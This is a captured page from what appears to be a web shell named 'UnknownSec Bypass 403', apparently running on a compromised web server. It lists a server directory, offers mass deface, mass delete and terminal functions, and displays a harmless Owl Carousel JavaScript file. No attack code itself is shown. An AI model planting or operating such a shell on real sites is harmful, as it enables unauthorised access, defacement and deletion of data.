UnknownSec Bypass
403
:
/
var
/
www
/
stp-bhaktisagar-backend
/
public
/
assets
/
js
/ [
drwxrwxr-x
]
Menu
Upload
Mass depes
Mass delete
Terminal
Info server
About
name :
carousel.js
$(function() { 'use strict'; if($('.owl-basic').length) { $('.owl-basic').owlCarousel({ loop:true, margin:10, nav:false, responsive:{ 0:{ items:2 }, 600:{ items:3 }, 1000:{ items:4 } } }); } if($('.owl-auto-play').length) { $('.owl-auto-play').owlCarousel({ items:4, loop:true, margin:10, autoplay:true, autoplayTimeout:1000, autoplayHoverPause:true, responsive:{ 0:{ items:2 }, 600:{ items:3 }, 1000:{ items:4 } } }); } if($('.owl-fadeout').length) { $('.owl-fadeout').owlCarousel({ animateOut: 'fadeOut', items:1, margin:30, stagePadding:30, smartSpeed:450 }); } if($('.owl-animate-css').length) { $('.owl-animate-css').owlCarousel({ animateOut: 'animate__animated animate__slideOutDown', animateIn: 'animate__animated animate__flipInX', items:1, margin:30, stagePadding:30, smartSpeed:450 }); } if($('.owl-mouse-wheel').length) { var owl = $('.owl-mouse-wheel'); owl.owlCarousel({ loop:true, nav:false, margin:10, responsive:{ 0:{ items:2 }, 600:{ items:3 }, 960:{ items:3 }, 1200:{ items:4 } } }); owl.on('mousewheel', '.owl-stage', function (e) { if (e.deltaY>0) { owl.trigger('next.owl'); } else { owl.trigger('prev.owl'); } e.preventDefault(); }); } });
Copyright © 2025 - UnknownSec